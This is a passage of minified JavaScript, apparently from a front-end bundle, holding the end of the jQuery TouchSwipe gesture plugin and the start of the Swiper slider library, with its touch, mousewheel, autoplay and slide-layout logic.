i,n,o,s,a,r,l,c,u,d,h,p,f=Te?t.touches[0]:t,m=S(f);if(J=I(),Te&&(Q=t.touches.length),X=Ce,2==Q&&(0==q?(T(1,t.touches[1]),q=B=P(K[0].start,K[1].start)):(S(t.touches[1]),B=P(K[0].end,K[1].end),K[0].end,K[1].end,Y=N<1?ue:ce),N=(B/q*1).toFixed(2),V=Math.abs(q-B)),Q===y.fingers||y.fingers===be||!Te||_()){if(d=m.start,h=m.end,p=function(e,t){var i=e.x-t.x,n=t.y-e.y,o=Math.atan2(n,i),s=Math.round(180*o/Math.PI);s<0&&(s=360-Math.abs(s));return s}(d,h),function(e,t){if(y.allowPageScroll===de||_())e.preventDefault();else{var i=y.allowPageScroll===he;switch(t){case se:(y.swipeLeft&&i||!i&&y.allowPageScroll!=ye)&&e.preventDefault();break;case ae:(y.swipeRight&&i||!i&&y.allowPageScroll!=ye)&&e.preventDefault();break;case re:(y.swipeUp&&i||!i&&y.allowPageScroll!=we)&&e.preventDefault();break;case le:(y.swipeDown&&i||!i&&y.allowPageScroll!=we)&&e.preventDefault()}}}(e,W=p<=45&&0<=p?se:p<=360&&315<=p?se:135<=p&&p<=225?ae:45<p&&p<135?le:re),c=m.start,u=m.end,R=Math.round(Math.sqrt(Math.pow(u.x-c.x,2)+Math.pow(u.y-c.y,2))),F=O(),r=W,l=R,l=Math.max(l,z(r)),G[r].distance=l,(y.swipeStatus||y.pinchStatus)&&(i=b(t,X)),!y.triggerOnTouchEnd||y.triggerOnTouchLeave){var g=!0;if(y.triggerOnTouchLeave){var v={left:(a=(s=oe(s=this)).offset()).left,right:a.left+s.outerWidth(),top:a.top,bottom:a.top+s.outerHeight()};n=m.end,o=v,g=n.x>o.left&&n.x<o.right&&n.y>o.top&&n.y<o.bottom}!y.triggerOnTouchEnd&&g?X=w(Ce):y.triggerOnTouchLeave&&!g&&(X=w($e)),X!=ke&&X!=$e||b(t,X)}}else b(t,X=ke);!1===i&&b(t,X=ke)}}function n(e){var t=e.originalEvent;return Te&&0<t.touches.length?(ee=I(),te=event.touches.length+1,!0):($()&&(Q=te),e.preventDefault(),J=I(),F=O(),c()?b(t,X=ke):y.triggerOnTouchEnd||0==y.triggerOnTouchEnd&&X===Ce?b(t,X=$e):!y.triggerOnTouchEnd&&g()?r(t,X=$e,me):X===Ce&&b(t,X=ke),k(!1),null)}function o(){B=q=Z=J=Q=0,N=1,C(),k(!1)}function s(e){var t=e.originalEvent;y.triggerOnTouchLeave&&(X=w($e),b(t,X))}function a(){U.unbind(A,t),U.unbind(j,o),U.unbind(L,i),U.unbind(D,n),H&&U.unbind(H,s),k(!1)}function w(e){var t=e,i=u(),n=l(),o=c();return!i||o?t=ke:!n||e!=Ce||y.triggerOnTouchEnd&&!y.triggerOnTouchLeave?!n&&e==$e&&y.triggerOnTouchLeave&&(t=ke):t=$e,t}function b(e,t){var i=void 0;return h()&&p()||p()?i=r(e,t,pe):(d()&&_()||_())&&!1!==i&&(i=r(e,t,fe)),x()&&v()&&!1!==i?i=r(e,t,ge):F>y.longTapThreshold&&R<_e&&y.longTap&&!1!==i?i=r(e,t,ve):1!==Q&&Te||!isNaN(R)&&0!==R||!g()||!1===i||(i=r(e,t,me)),t===ke&&o(),t===$e&&(Te?0==e.touches.length&&o():o()),i}function r(e,t,i){var n=void 0;if(i==pe){if(U.trigger("swipeStatus",[t,W||null,R||0,F||0,Q]),y.swipeStatus&&!1===(n=y.swipeStatus.call(U,e,t,W||null,R||0,F||0,Q)))return!1;if(t==$e&&h()){if(U.trigger("swipe",[W,R,F,Q]),y.swipe&&!1===(n=y.swipe.call(U,e,W,R,F,Q)))return!1;switch(W){case se:U.trigger("swipeLeft",[W,R,F,Q]),y.swipeLeft&&(n=y.swipeLeft.call(U,e,W,R,F,Q));break;case ae:U.trigger("swipeRight",[W,R,F,Q]),y.swipeRight&&(n=y.swipeRight.call(U,e,W,R,F,Q));break;case re:U.trigger("swipeUp",[W,R,F,Q]),y.swipeUp&&(n=y.swipeUp.call(U,e,W,R,F,Q));break;case le:U.trigger("swipeDown",[W,R,F,Q]),y.swipeDown&&(n=y.swipeDown.call(U,e,W,R,F,Q))}}}if(i==fe){if(U.trigger("pinchStatus",[t,Y||null,V||0,F||0,Q,N]),y.pinchStatus&&!1===(n=y.pinchStatus.call(U,e,t,Y||null,V||0,F||0,Q,N)))return!1;if(t==$e&&d())switch(Y){case ce:U.trigger("pinchIn",[Y||null,V||0,F||0,Q,N]),y.pinchIn&&(n=y.pinchIn.call(U,e,Y||null,V||0,F||0,Q,N));break;case ue:U.trigger("pinchOut",[Y||null,V||0,F||0,Q,N]),y.pinchOut&&(n=y.pinchOut.call(U,e,Y||null,V||0,F||0,Q,N))}}return i==me?t!==ke&&t!==$e||(clearTimeout(ne),v()&&!x()?(ie=I(),ne=setTimeout(oe.proxy(function(){ie=null,U.trigger("tap",[e.target]),y.tap&&(n=y.tap.call(U,e,e.target))},this),y.doubleTapThreshold)):(ie=null,U.trigger("tap",[e.target]),y.tap&&(n=y.tap.call(U,e,e.target)))):i==ge?t!==ke&&t!==$e||(clearTimeout(ne),ie=null,U.trigger("doubletap",[e.target]),y.doubleTap&&(n=y.doubleTap.call(U,e,e.target))):i==ve&&(t!==ke&&t!==$e||(clearTimeout(ne),ie=null,U.trigger("longtap",[e.target]),y.longTap&&(n=y.longTap.call(U,e,e.target)))),n}function l(){var e=!0;return null!==y.threshold&&(e=R>=y.threshold),e}function c(){var e=!1;return null!==y.cancelThreshold&&null!==W&&(e=z(W)-R>=y.cancelThreshold),e}function u(){return!y.maxTimeThreshold||!(F>=y.maxTimeThreshold)}function d(){var e=f(),t=m(),i=function(){if(null!==y.pinchThreshold)return V>=y.pinchThreshold;return!0}();return e&&t&&i}function _(){return!!(y.pinchStatus||y.pinchIn||y.pinchOut)}function h(){var e=u(),t=l(),i=f(),n=m(),o=c(),s=!o&&n&&i&&t&&e;return s}function p(){return!!(y.swipe||y.swipeStatus||y.swipeLeft||y.swipeRight||y.swipeUp||y.swipeDown)}function f(){return Q===y.fingers||y.fingers===be||!Te}function m(){return 0!==K[0].end.x}function g(){return!!y.tap}function v(){return!!y.doubleTap}function x(){if(null==ie)return!1;var e=I();return v()&&e-ie<=y.doubleTapThreshold}function C(){te=ee=0}function $(){var e=!1;if(ee){var t=I()-ee;t<=y.fingerReleaseThreshold&&(e=!0)}return e}function k(e){!0===e?(U.bind(L,i),U.bind(D,n),H&&U.bind(H,s)):(U.unbind(L,i,!1),U.unbind(D,n,!1),H&&U.unbind(H,s,!1)),U.data(Se+"_intouch",!0===e)}function T(e,t){var i=void 0!==t.identifier?t.identifier:0;return K[e].identifier=i,K[e].start.x=K[e].end.x=t.pageX||t.clientX,K[e].start.y=K[e].end.y=t.pageY||t.clientY,K[e]}function S(e){var t=void 0!==e.identifier?e.identifier:0,i=function(e){for(var t=0;t<K.length;t++)if(K[t].identifier==e)return K[t]}(t);return i.end.x=e.pageX||e.clientX,i.end.y=e.pageY||e.clientY,i}function z(e){if(G[e])return G[e].distance}function E(e){return{direction:e,distance:0}}function O(){return J-Z}function P(e,t){var i=Math.abs(e.x-t.x),n=Math.abs(e.y-t.y);return Math.round(Math.sqrt(i*i+n*n))}function I(){var e=new Date;return e.getTime()}var M=Te||!y.fallbackToMouseEvents,A=M?"touchstart":"mousedown",L=M?"touchmove":"mousemove",D=M?"touchend":"mouseup",H=M?null:"mouseleave",j="touchcancel",R=0,W=null,F=0,q=0,B=0,N=1,V=0,Y=0,G=null,U=oe(e),X="start",Q=0,K=null,Z=0,J=0,ee=0,te=0,ie=0,ne=null;try{U.bind(A,t),U.bind(j,o)}catch(e){oe.error("events not supported "+A+","+j+" on jQuery.swipe")}this.enable=function(){return U.bind(A,t),U.bind(j,o),U},this.disable=function(){return a(),U},this.destroy=function(){return a(),U.data(Se,null),U},this.option=function(e,t){if(void 0!==y[e]){if(void 0===t)return y[e];y[e]=t}else oe.error("Option "+e+" does not exist on jQuery.swipe.options");return null}}(this,i),e.data(Se,t))})}var se="left",ae="right",re="up",le="down",ce="in",ue="out",de="none",he="auto",pe="swipe",fe="pinch",me="tap",ge="doubletap",ve="longtap",ye="horizontal",we="vertical",be="all",_e=10,xe="start",Ce="move",$e="end",ke="cancel",Te="ontouchstart"in window,Se="TouchSwipe";oe.fn.swipe=function(e){var t=oe(this),i=t.data(Se);if(i&&"string"==typeof e){if(i[e])return i[e].apply(this,Array.prototype.slice.call(arguments,1));oe.error("Method "+e+" does not exist on jQuery.swipe")}else if(!(i||"object"!=typeof e&&e))return n.apply(this,arguments);return t},oe.fn.swipe.defaults={fingers:1,threshold:75,cancelThreshold:null,pinchThreshold:20,maxTimeThreshold:null,fingerReleaseThreshold:250,longTapThreshold:500,doubleTapThreshold:200,swipe:null,swipeLeft:null,swipeRight:null,swipeUp:null,swipeDown:null,swipeStatus:null,pinchIn:null,pinchOut:null,pinchStatus:null,click:null,tap:null,doubleTap:null,longTap:null,triggerOnTouchEnd:!0,triggerOnTouchLeave:!1,allowPageScroll:"auto",fallbackToMouseEvents:!0,excludedElements:"label, button, input, select, textarea, a, .noSwipe"},oe.fn.swipe.phases={PHASE_START:xe,PHASE_MOVE:Ce,PHASE_END:$e,PHASE_CANCEL:ke},oe.fn.swipe.directions={LEFT:se,RIGHT:ae,UP:re,DOWN:le,IN:ce,OUT:ue},oe.fn.swipe.pageScroll={NONE:de,HORIZONTAL:ye,VERTICAL:we,AUTO:he},oe.fn.swipe.fingers={ONE:1,TWO:2,THREE:3,ALL:be}}),function(){"use strict";function e(e){e.fn.swiper=function(t){var i;return e(this).each(function(){var e=new H(this,t);i||(i=e)}),i}}var D,t,i,n,o,s,a,r,l,H=function(e,l){function m(e){return Math.floor(e)}function t(){var e=b.params.autoplay,t=b.slides.eq(b.activeIndex);t.attr("data-swiper-autoplay")&&(e=t.attr("data-swiper-autoplay")||b.params.autoplay),b.autoplayTimeoutId=setTimeout(function(){b.params.loop?(b.fixLoop(),b._slideNext(),b.emit("onAutoplay",b)):b.isEnd?l.autoplayStopOnLast?b.stopAutoplay():(b._slideTo(0),b.emit("onAutoplay",b)):(b._slideNext(),b.emit("onAutoplay",b))},e)}function a(e,i){var t=D(e.target);if(!t.is(i))if("string"==typeof i)t=t.parents(i);else if(i.nodeType){var n;return t.parents().each(function(e,t){t===i&&(n=i)}),n?i:void 0}if(0!==t.length)return t[0]}function i(e,t){t=t||{};var i=new(window.MutationObserver||window.WebkitMutationObserver)(function(e){e.forEach(function(e){b.onResize(!0),b.emit("onObserverUpdate",b,e)})});i.observe(e,{attributes:void 0===t.attributes||t.attributes,childList:void 0===t.childList||t.childList,characterData:void 0===t.characterData||t.characterData}),b.observers.push(i)}function n(e){e.originalEvent&&(e=e.originalEvent);var t=e.keyCode||e.charCode;if(!b.params.allowSwipeToNext&&(b.isHorizontal()&&39===t||!b.isHorizontal()&&40===t))return!1;if(!b.params.allowSwipeToPrev&&(b.isHorizontal()&&37===t||!b.isHorizontal()&&38===t))return!1;if(!(e.shiftKey||e.altKey||e.ctrlKey||e.metaKey||document.activeElement&&document.activeElement.nodeName&&("input"===document.activeElement.nodeName.toLowerCase()||"textarea"===document.activeElement.nodeName.toLowerCase()))){if(37===t||39===t||38===t||40===t){var i=!1;if(0<b.container.parents("."+b.params.slideClass).length&&0===b.container.parents("."+b.params.slideActiveClass).length)return;var n=window.pageXOffset,o=window.pageYOffset,s=window.innerWidth,a=window.innerHeight,r=b.container.offset();b.rtl&&(r.left=r.left-b.container[0].scrollLeft);for(var l=[[r.left,r.top],[r.left+b.width,r.top],[r.left,r.top+b.height],[r.left+b.width,r.top+b.height]],c=0;c<l.length;c++){var u=l[c];u[0]>=n&&u[0]<=n+s&&u[1]>=o&&u[1]<=o+a&&(i=!0)}if(!i)return}b.isHorizontal()?(37!==t&&39!==t||(e.preventDefault?e.preventDefault():e.returnValue=!1),(39===t&&!b.rtl||37===t&&b.rtl)&&b.slideNext(),(37===t&&!b.rtl||39===t&&b.rtl)&&b.slidePrev()):(38!==t&&40!==t||(e.preventDefault?e.preventDefault():e.returnValue=!1),40===t&&b.slideNext(),38===t&&b.slidePrev())}}function o(e){e.originalEvent&&(e=e.originalEvent);var t=0,i=b.rtl?-1:1,n=function(e){var t=0,i=0,n=0,o=0;"detail"in e&&(i=e.detail);"wheelDelta"in e&&(i=-e.wheelDelta/120);"wheelDeltaY"in e&&(i=-e.wheelDeltaY/120);"wheelDeltaX"in e&&(t=-e.wheelDeltaX/120);"axis"in e&&e.axis===e.HORIZONTAL_AXIS&&(t=i,i=0);n=10*t,o=10*i,"deltaY"in e&&(o=e.deltaY);"deltaX"in e&&(n=e.deltaX);(n||o)&&e.deltaMode&&(1===e.deltaMode?(n*=40,o*=40):(n*=800,o*=800));n&&!t&&(t=n<1?-1:1);o&&!i&&(i=o<1?-1:1);return{spinX:t,spinY:i,pixelX:n,pixelY:o}}(e);if(b.params.mousewheelForceToAxis)if(b.isHorizontal()){if(!(Math.abs(n.pixelX)>Math.abs(n.pixelY)))return;t=n.pixelX*i}else{if(!(Math.abs(n.pixelY)>Math.abs(n.pixelX)))return;t=n.pixelY}else t=Math.abs(n.pixelX)>Math.abs(n.pixelY)?-n.pixelX*i:-n.pixelY;if(0!==t){if(b.params.mousewheelInvert&&(t=-t),b.params.freeMode){var o=b.getWrapperTranslate()+t*b.params.mousewheelSensitivity,s=b.isBeginning,a=b.isEnd;if(o>=b.minTranslate()&&(o=b.minTranslate()),o<=b.maxTranslate()&&(o=b.maxTranslate()),b.setWrapperTransition(0),b.setWrapperTranslate(o),b.updateProgress(),b.updateActiveIndex(),(!s&&b.isBeginning||!a&&b.isEnd)&&b.updateClasses(),b.params.freeModeSticky?(clearTimeout(b.mousewheel.timeout),b.mousewheel.timeout=setTimeout(function(){b.slideReset()},300)):b.params.lazyLoading&&b.lazy&&b.lazy.load(),b.emit("onScroll",b,e),b.params.autoplay&&b.params.autoplayDisableOnInteraction&&b.stopAutoplay(),0===o||o===b.maxTranslate())return}else{if(60<(new window.Date).getTime()-b.mousewheel.lastScrollTime)if(t<0)if(b.isEnd&&!b.params.loop||b.animating){if(b.params.mousewheelReleaseOnEdges)return!0}else b.slideNext(),b.emit("onScroll",b,e);else if(b.isBeginning&&!b.params.loop||b.animating){if(b.params.mousewheelReleaseOnEdges)return!0}else b.slidePrev(),b.emit("onScroll",b,e);b.mousewheel.lastScrollTime=(new window.Date).getTime()}return e.preventDefault?e.preventDefault():e.returnValue=!1,!1}}function s(e,t){var i,n,o;e=D(e);var s=b.rtl?-1:1;i=e.attr("data-swiper-parallax")||"0",n=e.attr("data-swiper-parallax-x"),o=e.attr("data-swiper-parallax-y"),n||o?(n=n||"0",o=o||"0"):b.isHorizontal()?(n=i,o="0"):(o=i,n="0"),n=0<=n.indexOf("%")?parseInt(n,10)*t*s+"%":n*t*s+"px",o=0<=o.indexOf("%")?parseInt(o,10)*t+"%":o*t+"px",e.transform("translate3d("+n+", "+o+",0px)")}function r(e){return 0!==e.indexOf("on")&&(e=e[0]!==e[0].toUpperCase()?"on"+e[0].toUpperCase()+e.substring(1):"on"+e),e}if(!(this instanceof H))return new H(e,l);var c={direction:"horizontal",touchEventsTarget:"container",initialSlide:0,speed:300,autoplay:!1,autoplayDisableOnInteraction:!0,autoplayStopOnLast:!1,iOSEdgeSwipeDetection:!1,iOSEdgeSwipeThreshold:20,freeMode:!1,freeModeMomentum:!0,freeModeMomentumRatio:1,freeModeMomentumBounce:!0,freeModeMomentumBounceRatio:1,freeModeMomentumVelocityRatio:1,freeModeSticky:!1,freeModeMinimumVelocity:.02,autoHeight:!1,setWrapperSize:!1,virtualTranslate:!1,effect:"slide",coverflow:{rotate:50,stretch:0,depth:100,modifier:1,slideShadows:!0},flip:{slideShadows:!0,limitRotation:!0},cube:{slideShadows:!0,shadow:!0,shadowOffset:20,shadowScale:.94},fade:{crossFade:!1},parallax:!1,zoom:!1,zoomMax:3,zoomMin:1,zoomToggle:!0,scrollbar:null,scrollbarHide:!0,scrollbarDraggable:!1,scrollbarSnapOnRelease:!1,keyboardControl:!1,mousewheelControl:!1,mousewheelReleaseOnEdges:!1,mousewheelInvert:!1,mousewheelForceToAxis:!1,mousewheelSensitivity:1,mousewheelEventsTarged:"container",hashnav:!1,hashnavWatchState:!1,history:!1,replaceState:!1,breakpoints:void 0,spaceBetween:0,slidesPerView:1,slidesPerColumn:1,slidesPerColumnFill:"column",slidesPerGroup:1,centeredSlides:!1,slidesOffsetBefore:0,slidesOffsetAfter:0,roundLengths:!1,touchRatio:1,touchAngle:45,simulateTouch:!0,shortSwipes:!0,longSwipes:!0,longSwipesRatio:.5,longSwipesMs:300,followFinger:!0,onlyExternal:!1,threshold:0,touchMoveStopPropagation:!0,touchReleaseOnEdges:!1,uniqueNavElements:!0,pagination:null,paginationElement:"span",paginationClickable:!1,paginationHide:!1,paginationBulletRender:null,paginationProgressRender:null,paginationFractionRender:null,paginationCustomRender:null,paginationType:"bullets",resistance:!0,resistanceRatio:.85,nextButton:null,prevButton:null,watchSlidesProgress:!1,watchSlidesVisibility:!1,grabCursor:!1,preventClicks:!0,preventClicksPropagation:!0,slideToClickedSlide:!1,lazyLoading:!1,lazyLoadingInPrevNext:!1,lazyLoadingInPrevNextAmount:1,lazyLoadingOnTransitionStart:!1,preloadImages:!0,updateOnImagesReady:!0,loop:!1,loopAdditionalSlides:0,loopedSlides:null,control:void 0,controlInverse:!1,controlBy:"slide",normalizeSlideIndex:!0,allowSwipeToPrev:!0,allowSwipeToNext:!0,swipeHandler:null,noSwiping:!0,noSwipingClass:"swiper-no-swiping",passiveListeners:!0,containerModifierClass:"swiper-container-",slideClass:"swiper-slide",slideActiveClass:"swiper-slide-active",slideDuplicateActiveClass:"swiper-slide-duplicate-active",slideVisibleClass:"swiper-slide-visible",slideDuplicateClass:"swiper-slide-duplicate",slideNextClass:"swiper-slide-next",slideDuplicateNextClass:"swiper-slide-duplicate-next",slidePrevClass:"swiper-slide-prev",slideDuplicatePrevClass:"swiper-slide-duplicate-prev",wrapperClass:"swiper-wrapper",bulletClass:"swiper-pagination-bullet",bulletActiveClass:"swiper-pagination-bullet-active",buttonDisabledClass:"swiper-button-disabled",paginationCurrentClass:"swiper-pagination-current",paginationTotalClass:"swiper-pagination-total",paginationHiddenClass:"swiper-pagination-hidden",paginationProgressbarClass:"swiper-pagination-progressbar",paginationClickableClass:"swiper-pagination-clickable",paginationModifierClass:"swiper-pagination-",lazyLoadingClass:"swiper-lazy",lazyStatusLoadingClass:"swiper-lazy-loading",lazyStatusLoadedClass:"swiper-lazy-loaded",lazyPreloaderClass:"swiper-lazy-preloader",notificationClass:"swiper-notification",preloaderClass:"preloader",zoomContainerClass:"swiper-zoom-container",observer:!1,observeParents:!1,a11y:!1,prevSlideMessage:"Previous slide",nextSlideMessage:"Next slide",firstSlideMessage:"This is the first slide",lastSlideMessage:"This is the last slide",paginationBulletMessage:"Go to slide {{index}}",runCallbacksOnInit:!0},u=l&&l.virtualTranslate;l=l||{};var d={};for(var h in l)if("object"!=typeof l[h]||null===l[h]||(l[h].nodeType||l[h]===window||l[h]===document||void 0!==j&&l[h]instanceof j||"undefined"!=typeof jQuery&&l[h]instanceof jQuery))d[h]=l[h];else for(var p in d[h]={},l[h])d[h][p]=l[h][p];for(var f in c)if(void 0===l[f])l[f]=c[f];else if("object"==typeof l[f])for(var g in c[f])void 0===l[f][g]&&(l[f][g]=c[f][g]);var b=this;if(b.params=l,b.originalParams=d,b.classNames=[],void 0!==D&&void 0!==j&&(D=j),(void 0!==D||(D=void 0===j?window.Dom7||window.Zepto||window.jQuery:j))&&(b.$=D,b.currentBreakpoint=void 0,b.getActiveBreakpoint=function(){if(!b.params.breakpoints)return!1;var e,t=!1,i=[];for(e in b.params.breakpoints)b.params.breakpoints.hasOwnProperty(e)&&i.push(e);i.sort(function(e,t){return parseInt(e,10)>parseInt(t,10)});for(var n=0;n<i.length;n++)(e=i[n])>=window.innerWidth&&!t&&(t=e);return t||"max"},b.setBreakpoint=function(){var e=b.getActiveBreakpoint();if(e&&b.currentBreakpoint!==e){var t=e in b.params.breakpoints?b.params.breakpoints[e]:b.originalParams,i=b.params.loop&&t.slidesPerView!==b.params.slidesPerView;for(var n in t)b.params[n]=t[n];b.currentBreakpoint=e,i&&b.destroyLoop&&b.reLoop(!0)}},b.params.breakpoints&&b.setBreakpoint(),b.container=D(e),0!==b.container.length)){if(1<b.container.length){var v=[];return b.container.each(function(){v.push(new H(this,l))}),v}(b.container[0].swiper=b).container.data("swiper",b),b.classNames.push(b.params.containerModifierClass+b.params.direction),b.params.freeMode&&b.classNames.push(b.params.containerModifierClass+"free-mode"),b.support.flexbox||(b.classNames.push(b.params.containerModifierClass+"no-flexbox"),b.params.slidesPerColumn=1),b.params.autoHeight&&b.classNames.push(b.params.containerModifierClass+"autoheight"),(b.params.parallax||b.params.watchSlidesVisibility)&&(b.params.watchSlidesProgress=!0),b.params.touchReleaseOnEdges&&(b.params.resistanceRatio=0),0<=["cube","coverflow","flip"].indexOf(b.params.effect)&&(b.support.transforms3d?(b.params.watchSlidesProgress=!0,b.classNames.push(b.params.containerModifierClass+"3d")):b.params.effect="slide"),"slide"!==b.params.effect&&b.classNames.push(b.params.containerModifierClass+b.params.effect),"cube"===b.params.effect&&(b.params.resistanceRatio=0,b.params.slidesPerView=1,b.params.slidesPerColumn=1,b.params.slidesPerGroup=1,b.params.centeredSlides=!1,b.params.spaceBetween=0,b.params.virtualTranslate=!0,b.params.setWrapperSize=!1),"fade"!==b.params.effect&&"flip"!==b.params.effect||(b.params.slidesPerView=1,b.params.slidesPerColumn=1,b.params.slidesPerGroup=1,b.params.watchSlidesProgress=!0,b.params.spaceBetween=0,b.params.setWrapperSize=!1,void 0===u&&(b.params.virtualTranslate=!0)),b.params.grabCursor&&b.support.touch&&(b.params.grabCursor=!1),b.wrapper=b.container.children("."+b.params.wrapperClass),b.params.pagination&&(b.paginationContainer=D(b.params.pagination),b.params.uniqueNavElements&&"string"==typeof b.params.pagination&&1<b.paginationContainer.length&&1===b.container.find(b.params.pagination).length&&(b.paginationContainer=b.container.find(b.params.pagination)),"bullets"===b.params.paginationType&&b.params.paginationClickable?b.paginationContainer.addClass(b.params.paginationModifierClass+"clickable"):b.params.paginationClickable=!1,b.paginationContainer.addClass(b.params.paginationModifierClass+b.params.paginationType)),(b.params.nextButton||b.params.prevButton)&&(b.params.nextButton&&(b.nextButton=D(b.params.nextButton),b.params.uniqueNavElements&&"string"==typeof b.params.nextButton&&1<b.nextButton.length&&1===b.container.find(b.params.nextButton).length&&(b.nextButton=b.container.find(b.params.nextButton))),b.params.prevButton&&(b.prevButton=D(b.params.prevButton),b.params.uniqueNavElements&&"string"==typeof b.params.prevButton&&1<b.prevButton.length&&1===b.container.find(b.params.prevButton).length&&(b.prevButton=b.container.find(b.params.prevButton)))),b.isHorizontal=function(){return"horizontal"===b.params.direction},b.rtl=b.isHorizontal()&&("rtl"===b.container[0].dir.toLowerCase()||"rtl"===b.container.css("direction")),b.rtl&&b.classNames.push(b.params.containerModifierClass+"rtl"),b.rtl&&(b.wrongRTL="-webkit-box"===b.wrapper.css("display")),1<b.params.slidesPerColumn&&b.classNames.push(b.params.containerModifierClass+"multirow"),b.device.android&&b.classNames.push(b.params.containerModifierClass+"android"),b.container.addClass(b.classNames.join(" ")),b.translate=0,b.progress=0,b.velocity=0,b.lockSwipeToNext=function(){(b.params.allowSwipeToNext=!1)===b.params.allowSwipeToPrev&&b.params.grabCursor&&b.unsetGrabCursor()},b.lockSwipeToPrev=function(){(b.params.allowSwipeToPrev=!1)===b.params.allowSwipeToNext&&b.params.grabCursor&&b.unsetGrabCursor()},b.lockSwipes=function(){b.params.allowSwipeToNext=b.params.allowSwipeToPrev=!1,b.params.grabCursor&&b.unsetGrabCursor()},b.unlockSwipeToNext=function(){(b.params.allowSwipeToNext=!0)===b.params.allowSwipeToPrev&&b.params.grabCursor&&b.setGrabCursor()},b.unlockSwipeToPrev=function(){(b.params.allowSwipeToPrev=!0)===b.params.allowSwipeToNext&&b.params.grabCursor&&b.setGrabCursor()},b.unlockSwipes=function(){b.params.allowSwipeToNext=b.params.allowSwipeToPrev=!0,b.params.grabCursor&&b.setGrabCursor()},b.setGrabCursor=function(e){b.container[0].style.cursor="move",b.container[0].style.cursor=e?"-webkit-grabbing":"-webkit-grab",b.container[0].style.cursor=e?"-moz-grabbin":"-moz-grab",b.container[0].style.cursor=e?"grabbing":"grab"},b.unsetGrabCursor=function(){b.container[0].style.cursor=""},b.params.grabCursor&&b.setGrabCursor(),b.imagesToLoad=[],b.imagesLoaded=0,b.loadImage=function(e,t,i,n,o,s){function a(){s&&s()}var r;e.complete&&o?a():t?((r=new window.Image).onload=a,r.onerror=a,n&&(r.sizes=n),i&&(r.srcset=i),t&&(r.src=t)):a()},b.preloadImages=function(){function e(){null!=b&&(void 0!==b.imagesLoaded&&b.imagesLoaded++,b.imagesLoaded===b.imagesToLoad.length&&(b.params.updateOnImagesReady&&b.update(),b.emit("onImagesReady",b)))}b.imagesToLoad=b.container.find("img");for(var t=0;t<b.imagesToLoad.length;t++)b.loadImage(b.imagesToLoad[t],b.imagesToLoad[t].currentSrc||b.imagesToLoad[t].getAttribute("src"),b.imagesToLoad[t].srcset||b.imagesToLoad[t].getAttribute("srcset"),b.imagesToLoad[t].sizes||b.imagesToLoad[t].getAttribute("sizes"),!0,e)},b.autoplayTimeoutId=void 0,b.autoplaying=!1,b.autoplayPaused=!1,b.startAutoplay=function(){return void 0===b.autoplayTimeoutId&&(!!b.params.autoplay&&(!b.autoplaying&&(b.autoplaying=!0,b.emit("onAutoplayStart",b),void t())))},b.stopAutoplay=function(e){b.autoplayTimeoutId&&(b.autoplayTimeoutId&&clearTimeout(b.autoplayTimeoutId),b.autoplaying=!1,b.autoplayTimeoutId=void 0,b.emit("onAutoplayStop",b))},b.pauseAutoplay=function(e){b.autoplayPaused||(b.autoplayTimeoutId&&clearTimeout(b.autoplayTimeoutId),b.autoplayPaused=!0,0===e?(b.autoplayPaused=!1,t()):b.wrapper.transitionEnd(function(){b&&(b.autoplayPaused=!1,b.autoplaying?t():b.stopAutoplay())}))},b.minTranslate=function(){return-b.snapGrid[0]},b.maxTranslate=function(){return-b.snapGrid[b.snapGrid.length-1]},b.updateAutoHeight=function(){var e=[],t=0;if("auto"!==b.params.slidesPerView&&1<b.params.slidesPerView)for(R=0;R<Math.ceil(b.params.slidesPerView);R++){var i=b.activeIndex+R;if(i>b.slides.length)break;e.push(b.slides.eq(i)[0])}else e.push(b.slides.eq(b.activeIndex)[0]);for(R=0;R<e.length;R++)if(void 0!==e[R]){var n=e[R].offsetHeight;t=t<n?n:t}t&&b.wrapper.css("height",t+"px")},b.updateContainerSize=function(){var e,t;e=void 0!==b.params.width?b.params.width:b.container[0].clientWidth,t=void 0!==b.params.height?b.params.height:b.container[0].clientHeight,0===e&&b.isHorizontal()||0===t&&!b.isHorizontal()||(e=e-parseInt(b.container.css("padding-left"),10)-parseInt(b.container.css("padding-right"),10),t=t-parseInt(b.container.css("padding-top"),10)-parseInt(b.container.css("padding-bottom"),10),b.width=e,b.height=t,b.size=b.isHorizontal()?b.width:b.height)},b.updateSlidesSize=function(){b.slides=b.wrapper.children("."+b.params.slideClass),b.snapGrid=[],b.slidesGrid=[],b.slidesSizesGrid=[];var e,t=b.params.spaceBetween,i=-b.params.slidesOffsetBefore,n=0,o=0;if(void 0!==b.size){var s,a;"string"==typeof t&&0<=t.indexOf("%")&&(t=parseFloat(t.replace("%",""))/100*b.size),b.virtualSize=-t,b.rtl?b.slides.css({marginLeft:"",marginTop:""}):b.slides.css({marginRight:"",marginBottom:""}),1<b.params.slidesPerColumn&&(s=Math.floor(b.slides.length/b.params.slidesPerColumn)===b.slides.length/b.params.slidesPerColumn?b.slides.length:Math.ceil(b.slides.length/b.params.slidesPerColumn)*b.params.slidesPerColumn,"auto"!==b.params.slidesPerView&&"row"===b.params.slidesPerColumnFill&&(s=Math.max(s,b.params.slidesPerView*b.params.slidesPerColumn)));var r,l=b.params.slidesPerColumn,c=s/l,u=c-(b.params.slidesPerColumn*c-b.slides.length);for(e=0;e<b.slides.length;e++){a=0;var d,h,p,f=b.slides.eq(e);if(1<b.params.slidesPerColumn)"column"===b.params.slidesPerColumnFill?(p=e-(h=Math.floor(e/l))*l,(u<h||h===u&&p===l-1)&&++p>=l&&(p=0,h++),d=h+p*s/l,f.css({"-webkit-box-ordinal-group":d,"-moz-box-ordinal-group":d,"-ms-flex-order":d,"-webkit-order":d,order:d})):h=e-(p=Math.floor(e/c))*c,f.css("margin-"+(b.isHorizontal()?"top":"left"),0!==p&&b.params.spaceBetween&&b.params.spaceBetween+"px").attr("data-swiper-column",h).attr("data-swiper-row",p);"none"!==f.css("display")&&("auto"===b.params.slidesPerView?(a=b.isHorizontal()?f.outerWidth(!0):f.outerHeight(!0),b.params.roundLengths&&(a=m(a))):(a=(b.size-(b.params.slidesPerView-1)*t)/b.params.slidesPerView,b.params.roundLengths&&(a=m(a)),b.isHorizontal()?b.slides[e].style.width=a+"px":b.slides[e].style.height=a+"px"),b.slides[e].swiperSlideSize=a,b.slidesSizesGrid.push(a),b.params.centeredSlides?(i=i+a/2+n/2+t,0===e&&(i=i-b.size/2-t),Math.abs(i)<.001&&(i=0),o%b.params.slidesPerGroup==0&&b.snapGrid.push(i),b.slidesGrid.push(i)):(o%b.params.slidesPerGroup==0&&b.snapGrid.push(i),b.slidesGrid.push(i),i=i+a+t),b.virtualSize+=a+t,n=a,o++)}if(b.virtualSize=Math.max(b.virtualSize,b.size)+b.params.slidesOffsetAfter,